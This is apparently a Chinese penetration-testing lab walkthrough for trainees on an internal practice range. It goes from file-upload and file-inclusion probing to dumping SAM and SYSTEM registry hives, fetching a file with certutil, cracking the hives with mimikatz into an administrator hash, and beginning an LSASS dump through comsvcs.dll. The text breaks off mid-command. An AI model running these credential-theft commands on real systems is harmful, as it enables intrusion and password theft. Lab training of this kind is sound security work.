本靶场用于内部学员进行渗透测试渗透要求:精准定位到某位成员的个人主机渗透过程物理机网段:192.168.1.1/24上传.php文件拦截上传.aaa文件拦截,白名单验证,00阶段和解析漏洞均无解。尝试dirsearch看下目录。存在1.phpupload.phpindex.php 可知存在文件包含http://www.hongduilanjun.com/index.php?url=./upload/1.jpgipconfig /all 查看得知工作组存在192.168.111.1/24 段。代理忽略。抓本地密码reg save hklm\sam sam.hivreg save hklm\system system.hiv如果解不开明文可以用certutil进行下载certutil.exe -urlcache -split -f http://192.168.111.138/1.zip导出sam表move到web路径下为zip,下载到本地mimikatz解密。删除webshell上zip文件mimikatz.exe "log" "lsadump::sam /system:system.hiv /sam:sam.hiv" "exit"得到hash:
administrator:a0f42e3f2c62fe3977e87c4ed35c0f7f获取lsass进程copy c:\windows\system32\comsvcs.dll c:\programdata\1.dlltasklist /svc |
………………………………